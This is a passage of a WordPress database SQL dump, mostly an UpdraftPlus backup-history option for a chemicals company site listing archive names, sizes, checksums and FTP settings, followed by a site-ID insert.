1-size";i:413364033;s:13:"uploads2-size";i:407743035;s:13:"uploads3-size";i:419230952;s:13:"uploads4-size";i:419401165;s:13:"uploads5-size";i:436966951;s:13:"uploads6-size";i:435434287;s:13:"uploads7-size";i:417874609;s:13:"uploads8-size";i:417273287;s:13:"uploads9-size";i:411608882;s:14:"uploads10-size";i:406203957;s:14:"uploads11-size";i:59417840;s:6:"others";a:1:{i:0;s:73:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-others.zip";}s:11:"others-size";i:1417831;s:2:"db";s:68:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-db.gz";s:7:"db-size";i:1352284;s:9:"checksums";a:1:{s:4:"sha1";a:16:{s:8:"plugins0";s:40:"9714a6714e50eb6d7335fe0a2f307c96f7639cb2";s:7:"themes0";s:40:"e41ee633ff6198fe7777f768804e7a0224257b45";s:8:"uploads0";s:40:"e7be209a75ebcf37c25d31a824815e1a376c2f92";s:8:"uploads1";s:40:"de8342fae4ec2f3bdbe6872c1b5de430acb67cac";s:8:"uploads2";s:40:"6381a5f90d21fafb0cdc817130cd95f81d1f5df2";s:8:"uploads3";s:40:"778ebc305e6300147296f808404b2a84b49d3276";s:8:"uploads4";s:40:"fcd960491e14e872672fbbc82e7ebd554cae732a";s:8:"uploads5";s:40:"0f074a701af3e8bcc75b2b74f11ea0c0740f6e34";s:8:"uploads6";s:40:"6e6eca251be7689ee4ac78845a53964157b67fd7";s:8:"uploads7";s:40:"babf408fc39e7090a6665252db044e738ca880f2";s:8:"uploads8";s:40:"1c3058f06a99361bb108917dffdd1ad8c5e3440e";s:8:"uploads9";s:40:"e494356cfeb07f447f84d6483c20a6f6768cca0f";s:9:"uploads10";s:40:"3cde77ce21e807cdbc3c16e417643bb3f840296b";s:9:"uploads11";s:40:"f1b07129a8f4f75dd7c132378ecddb0082f50fcd";s:7:"others0";s:40:"04600a395b5169faa93a5f25884ee1aa09aad60a";s:3:"db0";s:40:"02f3cfc3cfe690510e5c118074b50194e7cdeaac";}}s:5:"nonce";s:12:"3c070688b4d1";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1476898781;a:25:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-plugins.zip";}s:12:"plugins-size";i:45365281;s:6:"themes";a:1:{i:0;s:73:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads.zip";i:1;s:75:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads2.zip";i:2;s:75:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads3.zip";i:3;s:75:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads4.zip";i:4;s:75:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads5.zip";i:5;s:75:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads6.zip";i:6;s:75:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads7.zip";i:7;s:75:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads8.zip";i:8;s:75:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads9.zip";i:9;s:76:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads10.zip";i:10;s:76:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads11.zip";i:11;s:76:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-uploads12.zip";}s:12:"uploads-size";i:411371375;s:13:"uploads1-size";i:425899180;s:13:"uploads2-size";i:407549043;s:13:"uploads3-size";i:381797549;s:13:"uploads4-size";i:393787883;s:13:"uploads5-size";i:427816328;s:13:"uploads6-size";i:433610985;s:13:"uploads7-size";i:413378505;s:13:"uploads8-size";i:420008524;s:14:"uploads10-size";i:399297985;s:14:"uploads11-size";i:119869533;s:6:"others";a:1:{i:0;s:73:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-others.zip";}s:11:"others-size";i:1417831;s:2:"db";s:68:"backup_2016-10-19-1739_MillerStephenson_Chemicals_45260855a10d-db.gz";s:7:"db-size";i:1533042;s:9:"checksums";a:1:{s:4:"sha1";a:14:{s:8:"plugins0";s:40:"39a7a077361bee8798e6563d0432bc78a8df0f70";s:7:"themes0";s:40:"e41ee633ff6198fe7777f768804e7a0224257b45";s:8:"uploads0";s:40:"0de0fcd88889b1620734a1f85283051196e88021";s:8:"uploads1";s:40:"7bbb0e68d82971d184ba8c3f86c0e16f97e24f3c";s:8:"uploads2";s:40:"aebeaa4f83b4d3087e71c1bab9f21b1a269046ad";s:8:"uploads3";s:40:"d37bc00d41b9b87cf950a837236ce462707467f7";s:8:"uploads4";s:40:"d5e617b92de182460ab9293ee8ee632dc4b6328f";s:8:"uploads5";s:40:"0a200f3b98ea7defdeb6e48d1e051a0d0062837f";s:8:"uploads7";s:40:"455b808f56aacaf5c84fba9c74e5ddd09dc294cb";s:8:"uploads8";s:40:"c4f6f4a3d97c8a55526d6cc16a3d8d6db27e8b20";s:9:"uploads10";s:40:"f72ec6b54975267ad559942d966105c300853c94";s:9:"uploads11";s:40:"cd328a90a9ba22daf572f2b1d8023dd0a5ee8798";s:7:"others0";s:40:"04600a395b5169faa93a5f25884ee1aa09aad60a";s:3:"db0";s:40:"b88340b7d3e5348e291a1605063ea94bc0fccc84";}}s:5:"nonce";s:12:"45260855a10d";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1475198549;a:25:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-plugins.zip";}s:12:"plugins-size";i:36151491;s:6:"themes";a:1:{i:0;s:73:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-themes.zip";}s:11:"themes-size";i:22491659;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads.zip";i:1;s:75:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads2.zip";i:2;s:75:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads3.zip";i:3;s:75:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads4.zip";i:4;s:75:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads5.zip";i:5;s:75:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads6.zip";i:6;s:75:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads7.zip";i:7;s:75:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads8.zip";i:8;s:75:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads9.zip";i:9;s:76:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads10.zip";i:10;s:76:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads11.zip";i:11;s:76:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-uploads12.zip";}s:12:"uploads-size";i:419622137;s:13:"uploads1-size";i:406680510;s:13:"uploads2-size";i:419447933;s:13:"uploads3-size";i:419165195;s:13:"uploads4-size";i:418676763;s:13:"uploads5-size";i:425259563;s:13:"uploads7-size";i:410785357;s:13:"uploads8-size";i:418423231;s:13:"uploads9-size";i:421871227;s:14:"uploads10-size";i:415360179;s:14:"uploads11-size";i:44051030;s:6:"others";a:1:{i:0;s:73:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-others.zip";}s:11:"others-size";i:1420128;s:2:"db";s:68:"backup_2016-09-30-0122_MillerStephenson_Chemicals_1aca60c287d3-db.gz";s:7:"db-size";i:744434;s:9:"checksums";a:1:{s:4:"sha1";a:15:{s:8:"plugins0";s:40:"6871fcec18c7522f95837d727b1c9cf1ddc5bf41";s:7:"themes0";s:40:"84796c11c935f36d32077cb861117c328c61fc69";s:8:"uploads0";s:40:"d37718579be8ef76b8c8ba8c5f5b6d5324f3fece";s:8:"uploads1";s:40:"ccd6823f877e7fc6e2fda91475a14cceffdb0007";s:8:"uploads2";s:40:"39d498b9b35b822781373fbc86443494f62b2104";s:8:"uploads3";s:40:"d9fd7302330349049346b722ab862f48968aa782";s:8:"uploads4";s:40:"b22a16f07612f2c399d7588b302b95783798b129";s:8:"uploads5";s:40:"efac3486529220a4b9d0f13ef571a9c748ed24eb";s:8:"uploads7";s:40:"a946ea506e345f2659a2943e681b7b50da837728";s:8:"uploads8";s:40:"6668a9382235ad9e30db5945edd15afcb370bc9b";s:8:"uploads9";s:40:"c9a902577682acedb713a79e157fc2c73d9e2280";s:9:"uploads10";s:40:"e9ba811a00aa4058c913b01f0bdd7218f15d535d";s:9:"uploads11";s:40:"7f2e2417f4e91e6d29f96830b5c12b8151a32620";s:7:"others0";s:40:"561c007cf127aa13da7d86194782655ac16cf7e1";s:3:"db0";s:40:"39baa2df19bc2227d60239af41edcf57b37c387f";}}s:5:"nonce";s:12:"1aca60c287d3";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.20.1";s:12:"is_multisite";b:0;}i:1475112136;a:25:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-plugins.zip";}s:12:"plugins-size";i:36142020;s:6:"themes";a:1:{i:0;s:73:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-themes.zip";}s:11:"themes-size";i:22491659;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads.zip";i:1;s:75:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads2.zip";i:2;s:75:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads3.zip";i:3;s:75:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads4.zip";i:4;s:75:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads5.zip";i:5;s:75:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads6.zip";i:6;s:75:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads7.zip";i:7;s:75:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads8.zip";i:8;s:75:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads9.zip";i:9;s:76:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads10.zip";i:10;s:76:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads11.zip";i:11;s:76:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-uploads12.zip";}s:12:"uploads-size";i:419622137;s:13:"uploads1-size";i:406756880;s:13:"uploads2-size";i:419371563;s:13:"uploads3-size";i:419165195;s:13:"uploads4-size";i:419353014;s:13:"uploads5-size";i:424583312;s:13:"uploads7-size";i:410387718;s:13:"uploads8-size";i:420596949;s:13:"uploads9-size";i:422773520;s:14:"uploads10-size";i:417393428;s:14:"uploads11-size";i:144981405;s:6:"others";a:1:{i:0;s:73:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-others.zip";}s:11:"others-size";i:1420128;s:2:"db";s:68:"backup_2016-09-29-0122_MillerStephenson_Chemicals_f99109889eaa-db.gz";s:7:"db-size";i:656160;s:9:"checksums";a:1:{s:4:"sha1";a:15:{s:8:"plugins0";s:40:"5b4004f5dcc025d435b12ea57677f5859b9e6915";s:7:"themes0";s:40:"24ad780a30aeac229b1ad8fd66a4ee34851a3411";s:8:"uploads0";s:40:"28df6951bff8ea9139f843c1dad3ebfed596b4ae";s:8:"uploads1";s:40:"5107e0f9a2689376f4446f4d18cc5bbec2d395ff";s:8:"uploads2";s:40:"4203b87174e400054b253d8d43c4ac9195b40a50";s:8:"uploads3";s:40:"5148da9d72b51dd8dc6678fc59c313e033db8034";s:8:"uploads4";s:40:"798b46dc426b23ae096cf2ed9772b44000ab2cee";s:8:"uploads5";s:40:"33f9feb634eee5eb5aac67b80dfbb1bcfbfcc5d7";s:8:"uploads7";s:40:"408ea1d3e1a973f6985583f35d379dee09854b2d";s:8:"uploads8";s:40:"14f8ecf907b693b65b8f9343805404841ba76376";s:8:"uploads9";s:40:"fbe93047873c4d0315293713c7fa10a1a121f0e2";s:9:"uploads10";s:40:"86a80d2352cee2942bfd6cfe168baa32fda87ed2";s:9:"uploads11";s:40:"6ff49613717215238aed6388a7dc1039f6c66e1f";s:7:"others0";s:40:"561c007cf127aa13da7d86194782655ac16cf7e1";s:3:"db0";s:40:"02989fbb56f7e75132e00d6c3a42df449fe4211e";}}s:5:"nonce";s:12:"f99109889eaa";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.20.1";s:12:"is_multisite";b:0;}i:1475025716;a:24:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-plugins.zip";}s:12:"plugins-size";i:35975075;s:6:"themes";a:1:{i:0;s:73:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-themes.zip";}s:11:"themes-size";i:22491867;s:7:"uploads";a:11:{i:0;s:74:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads.zip";i:1;s:75:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads2.zip";i:2;s:75:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads3.zip";i:3;s:75:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads4.zip";i:4;s:75:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads5.zip";i:5;s:75:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads6.zip";i:6;s:75:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads7.zip";i:7;s:75:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads8.zip";i:8;s:75:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads9.zip";i:9;s:76:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads10.zip";i:10;s:76:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-uploads11.zip";}s:12:"uploads-size";i:419565070;s:13:"uploads1-size";i:406680510;s:13:"uploads2-size";i:419447933;s:13:"uploads3-size";i:419165195;s:13:"uploads4-size";i:418676763;s:13:"uploads5-size";i:425259563;s:13:"uploads7-size";i:417295212;s:13:"uploads8-size";i:420430314;s:13:"uploads9-size";i:415916707;s:14:"uploads10-size";i:265657685;s:6:"others";a:1:{i:0;s:73:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-others.zip";}s:11:"others-size";i:1420128;s:2:"db";s:68:"backup_2016-09-28-0121_MillerStephenson_Chemicals_1dbb64004f00-db.gz";s:7:"db-size";i:835021;s:9:"checksums";a:1:{s:4:"sha1";a:14:{s:8:"plugins0";s:40:"aa9f2ebd9a74a2eb1f38b6e9e0d26b7c3012adfc";s:7:"themes0";s:40:"440cc860c366a6efa3fd78d2cf088830fabef843";s:8:"uploads0";s:40:"f0d984e537ebe6baf8832ddd185a5d13136bdee7";s:8:"uploads1";s:40:"0d2bfa093830d0d085c79c559504f7b96226b0bf";s:8:"uploads2";s:40:"391a2ad6d0fa115d7ad6f4746baa54208db5daa5";s:8:"uploads3";s:40:"2f8b85e39ac97ce6b312ab5aab5dd90c07417412";s:8:"uploads4";s:40:"8928945941efd7506660565b544fe2725ae714d5";s:8:"uploads5";s:40:"e6a50fb7bed2ecd1075cd3af9be2effd906067ff";s:8:"uploads7";s:40:"27c156a69e284e5e9ea82f56fdf1f77def8144ad";s:8:"uploads8";s:40:"8ccd6980d9976bac853a3b4cb8ee52fa75f0ade0";s:8:"uploads9";s:40:"d5d4379fa227371d6510b8e50b78525144fda5d3";s:9:"uploads10";s:40:"543d8b0f1f4c4369d38bd08e09ee6197a9022146";s:7:"others0";s:40:"561c007cf127aa13da7d86194782655ac16cf7e1";s:3:"db0";s:40:"02f49644d055a2d88b8c93de25320d2d7e8d4aa3";}}s:5:"nonce";s:12:"1dbb64004f00";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.20.1";s:12:"is_multisite";b:0;}i:1474587120;a:23:{s:7:"service";a:1:{i:0;s:3:"ftp";}s:2:"db";a:1:{i:0;s:68:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-db.gz";}s:5:"nonce";s:12:"c3a72e254085";s:7:"db-size";i:699755;s:6:"native";b:0;s:6:"others";a:1:{i:0;s:73:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-others.zip";}s:11:"others-size";i:146;s:7:"plugins";a:1:{i:0;s:74:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-plugins.zip";}s:12:"plugins-size";i:22808501;s:6:"themes";a:1:{i:0;s:73:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-themes.zip";}s:11:"themes-size";i:21514875;s:7:"uploads";a:11:{i:0;s:74:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads.zip";i:9;s:76:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads10.zip";i:10;s:76:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads11.zip";i:1;s:75:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads2.zip";i:2;s:75:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads3.zip";i:3;s:75:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads4.zip";i:4;s:75:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads5.zip";i:5;s:75:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads6.zip";i:6;s:75:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads7.zip";i:7;s:75:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads8.zip";i:8;s:75:"backup_2016-09-22-2332_MillerStephenson_Chemicals_c3a72e254085-uploads9.zip";}s:12:"uploads-size";i:419579562;s:13:"uploads9-size";i:399848778;s:14:"uploads10-size";i:336665122;s:13:"uploads1-size";i:429618374;s:13:"uploads2-size";i:423151156;s:13:"uploads3-size";i:228853856;s:13:"uploads4-size";i:412304530;s:13:"uploads5-size";i:411988621;s:13:"uploads6-size";i:422734958;s:13:"uploads7-size";i:414119523;s:13:"uploads8-size";i:412750093;}i:1474398072;a:23:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-plugins.zip";}s:12:"plugins-size";i:23957573;s:6:"themes";a:1:{i:0;s:73:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-themes.zip";}s:11:"themes-size";i:21514787;s:7:"uploads";a:9:{i:0;s:74:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-uploads.zip";i:1;s:75:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-uploads2.zip";i:2;s:75:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-uploads3.zip";i:3;s:75:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-uploads4.zip";i:4;s:75:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-uploads5.zip";i:5;s:75:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-uploads6.zip";i:6;s:75:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-uploads7.zip";i:7;s:75:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-uploads8.zip";i:8;s:75:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-uploads9.zip";}s:12:"uploads-size";i:419399221;s:13:"uploads1-size";i:427244498;s:13:"uploads2-size";i:399747620;s:13:"uploads3-size";i:418791555;s:13:"uploads4-size";i:413460002;s:13:"uploads5-size";i:428911602;s:13:"uploads6-size";i:409261921;s:13:"uploads7-size";i:413654853;s:13:"uploads8-size";i:382074462;s:6:"others";a:1:{i:0;s:73:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-others.zip";}s:11:"others-size";i:146;s:2:"db";s:68:"backup_2016-09-20-1901_MillerStephenson_Chemicals_afd4e1acc61b-db.gz";s:7:"db-size";i:661543;s:9:"checksums";a:1:{s:4:"sha1";a:13:{s:8:"plugins0";s:40:"8471772755aab8a472fc043067b514e481a9618c";s:7:"themes0";s:40:"e7f4f2c0b2dbe0c4d8b16eb9c23dc10714c6a543";s:8:"uploads0";s:40:"c925d6db6ff4ace84bb53d3714b5cf43e77ddb64";s:8:"uploads1";s:40:"43b0cd2a343a0de230be220169a7d47cfec08c36";s:8:"uploads2";s:40:"0f543e07d285c39fcdf9c8b8b3cb94b539a817e4";s:8:"uploads3";s:40:"51f04cb922366fa8d52c040677a234fba68ff734";s:8:"uploads4";s:40:"87fc0de87e29a8e8f69c4542773cd83ed53af67d";s:8:"uploads5";s:40:"17dd9eefa5e37207dff7e23108c62da2e55b8104";s:8:"uploads6";s:40:"07f907a79f1875c3e5bd23f0ba3b18f901eb2bc7";s:8:"uploads7";s:40:"95d7e5fb340f4a9e171e304df6b1bfc9da5ec1d9";s:8:"uploads8";s:40:"29c99a5ae8dc89ff39407cca80ea27fda45ffa2e";s:7:"others0";s:40:"05fa00b3880a8ab43167981b67fca99ed283fa1b";s:3:"db0";s:40:"8027b435ef4d0f728ab536642dd13c851f5d683f";}}s:5:"nonce";s:12:"afd4e1acc61b";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:7:"1.12.17";s:12:"is_multisite";b:0;}i:1474311673;a:22:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-plugins.zip";}s:12:"plugins-size";i:23957571;s:6:"themes";a:1:{i:0;s:73:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-themes.zip";}s:11:"themes-size";i:21513580;s:7:"uploads";a:9:{i:0;s:74:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-uploads.zip";i:1;s:75:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-uploads2.zip";i:2;s:75:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-uploads3.zip";i:3;s:75:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-uploads4.zip";i:4;s:75:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-uploads5.zip";i:5;s:75:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-uploads6.zip";i:6;s:75:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-uploads7.zip";i:7;s:75:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-uploads8.zip";i:8;s:75:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-uploads9.zip";}s:12:"uploads-size";i:418866482;s:13:"uploads1-size";i:423251377;s:13:"uploads2-size";i:411814901;s:13:"uploads3-size";i:428684138;s:13:"uploads5-size";i:426041481;s:13:"uploads6-size";i:417417909;s:13:"uploads7-size";i:408254856;s:13:"uploads8-size";i:343320537;s:6:"others";a:1:{i:0;s:73:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-others.zip";}s:11:"others-size";i:146;s:2:"db";s:68:"backup_2016-09-19-1901_MillerStephenson_Chemicals_246d5027aa3f-db.gz";s:7:"db-size";i:645947;s:9:"checksums";a:1:{s:4:"sha1";a:12:{s:8:"plugins0";s:40:"d0f47077f005e985884fe565921624e346874b1f";s:7:"themes0";s:40:"76138508bb99f1a6b9a1dfe74f9be41aa85c6dd4";s:8:"uploads0";s:40:"0a78529f19f4d4a2607cbb3395c69371331107f4";s:8:"uploads1";s:40:"d025d56e1d19c4e89fd767a99eaf6f8e7d4689d0";s:8:"uploads2";s:40:"d23ee993ea026c3c80b5485ec08dd82b3645e7b2";s:8:"uploads3";s:40:"f6f726fa2a2aaa78330724a38fcfba6daf7243f8";s:8:"uploads5";s:40:"8144df440b0447a1af71ad7f4dd8aa800ced7544";s:8:"uploads6";s:40:"a0c4e9873425d4fd6a1e555b414a2391326b23fd";s:8:"uploads7";s:40:"7f6915e3ff402ba1e5c0b84d681120147651d91f";s:8:"uploads8";s:40:"30ec4e05360f7a063299bb941a15bb2a677276f9";s:7:"others0";s:40:"05fa00b3880a8ab43167981b67fca99ed283fa1b";s:3:"db0";s:40:"1071c2d765f12e6f6c0c0cfc91b6d462ef134f40";}}s:5:"nonce";s:12:"246d5027aa3f";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:7:"1.12.17";s:12:"is_multisite";b:0;}i:1474225274;a:23:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-plugins.zip";}s:12:"plugins-size";i:23957571;s:6:"themes";a:1:{i:0;s:73:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-themes.zip";}s:11:"themes-size";i:21513580;s:7:"uploads";a:9:{i:0;s:74:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-uploads.zip";i:1;s:75:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-uploads2.zip";i:2;s:75:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-uploads3.zip";i:3;s:75:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-uploads4.zip";i:4;s:75:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-uploads5.zip";i:5;s:75:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-uploads6.zip";i:6;s:75:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-uploads7.zip";i:7;s:75:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-uploads8.zip";i:8;s:75:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-uploads9.zip";}s:12:"uploads-size";i:418866482;s:13:"uploads1-size";i:423176535;s:13:"uploads2-size";i:412955143;s:13:"uploads3-size";i:416936920;s:13:"uploads4-size";i:414862137;s:13:"uploads5-size";i:414613948;s:13:"uploads6-size";i:417307189;s:13:"uploads7-size";i:418671076;s:13:"uploads8-size";i:207680204;s:6:"others";a:1:{i:0;s:73:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-others.zip";}s:11:"others-size";i:146;s:2:"db";s:68:"backup_2016-09-18-1901_MillerStephenson_Chemicals_2c99d78df0a2-db.gz";s:7:"db-size";i:637649;s:9:"checksums";a:1:{s:4:"sha1";a:13:{s:8:"plugins0";s:40:"aea8e4defe47f2cf71ee75f9cd2f36ad1ce8ebf5";s:7:"themes0";s:40:"a169186b7b2d9763ca9fa9e97e1d1ab5dabdc187";s:8:"uploads0";s:40:"59e90d1886316ff4be71c3ee6226b6b196a5fb88";s:8:"uploads1";s:40:"d6a948141960bc0e4c82cd8944ed28fd3f0bb2f6";s:8:"uploads2";s:40:"2f582d4923e5b2ca06880653eec0a0387e731621";s:8:"uploads3";s:40:"c9bf738cb8115ed20bba401b00f1dc3cfdf5f2e7";s:8:"uploads4";s:40:"8c35d59d7787f2188f7fea08bde952611c7be446";s:8:"uploads5";s:40:"e5abc73404ba1c7aa01b053484fbcb99aecfdce1";s:8:"uploads6";s:40:"9d22f321e01975b371a7a988fac12f8a28349bab";s:8:"uploads7";s:40:"62130be602a932a236c44afc4991a104df649a8e";s:8:"uploads8";s:40:"22843f62619a4aeb1f8ccdd49e656d72640ffd07";s:7:"others0";s:40:"05fa00b3880a8ab43167981b67fca99ed283fa1b";s:3:"db0";s:40:"bbfef7fdc298fe1d533d22a955fb84a109564ed2";}}s:5:"nonce";s:12:"2c99d78df0a2";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:7:"1.12.17";s:12:"is_multisite";b:0;}}', 'yes'); 
INSERT INTO `wp_options` VALUES (17864, 'updraftplus-addons_siteid', 'f19a8b0949418dde02ccd0b38e07e6d3', 'no'); 
